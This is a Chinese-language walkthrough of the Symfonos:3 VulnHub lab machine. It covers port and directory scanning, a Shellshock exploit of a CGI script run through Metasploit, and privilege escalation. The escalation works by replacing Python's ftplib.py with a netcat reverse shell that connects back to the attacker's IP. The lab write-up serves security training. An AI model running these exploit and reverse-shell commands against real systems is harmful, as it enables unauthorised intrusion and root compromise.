虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-3,332/
虚拟机简介:类似 OSCP 的基于现实生活的中级机器,旨在教授理解漏洞的重要性
目标:1个flag
级别:中级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.207.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.143
查看开放21、22、80端口
2、渗透测试
2.1 HTTP渗透测试
1.访问站点
查看网页源代码,提示爆破出underworld
2.使用gobuster进行爆破
gobuster dir -u http://192.168.207.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f
3.爆破二级目录
gobuster dir -u http://192.168.207.143/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f
发现在cgi-bin中存在/underworld/
4.访问站点查看有系统运行时间
http://192.168.207.143/cgi-bin/underworld
5.通过CGI-bin注入
在网上有相关CGI注入介绍:https://book.hacktricks.xyz/pentesting/pentesting-web/cgi
CGI (通用网关接口)定义了一种 Web 服务器与外部内容生成程序交互的方式,这些程序通常被称为 CGI 程序 或 CGI 脚本。
使用metasploit可以进行CGI
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.207.143
set targeturi /cgi-bin/underworld/
set lhost 192.168.207.129
run
获取到meterpreter会话
2.2 系统提权操作
1.探测系统版本
sysinfo
探测系统没有GCC
which gcc
2.查找二进制文件
find / -perm -u=s -type f 2>/dev/null
ping命令无提权方法
3.查看ftp服务
ps -ef | grep ftp
查看启动用户为hades
cat /etc/passwd | grep '/bin/bash'
查看该用户可以登录
4.查找各种方法测试,均不行
查看网上分析的教程,可以使用tcpdump进行抓取lo口分析,提示无权限
5.根据网上获取到的用户名和密码继续
用户名为:hades ,密码为:PTpZTfU4vxgzvRBE
上传psy32文件
upload /root/pspy32
6.查看pspy32监控信息
查看到以root身份执行的脚步
登录hades账户查看信息
cd /opt/ftpclient
ls -lah
7.文档无法写入
基于其他的文档中,ftpclient.py无写入权限,考虑利用ftp库
find / -iname '*ftplib*' 2>/dev/null
2.3 配置提权
1.写入文件到ftplib
echo 'os.system("nc -e /bin/bash 192.168.207.129 4444")' >> /usr/lib/python2.7/ftplib.py
提示无权限
2.创建新的文件
mv /usr/lib/python2.7/ftplib.py /usr/lib/python2.7/ftplib.py.bak
nano /usr/lib/python2.7/ftplib.py
import os
cmd="nc 192.168.207.129 4444 -e /bin/bash"
os.system(cmd)
3.查看反弹信息
4.查看flag
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论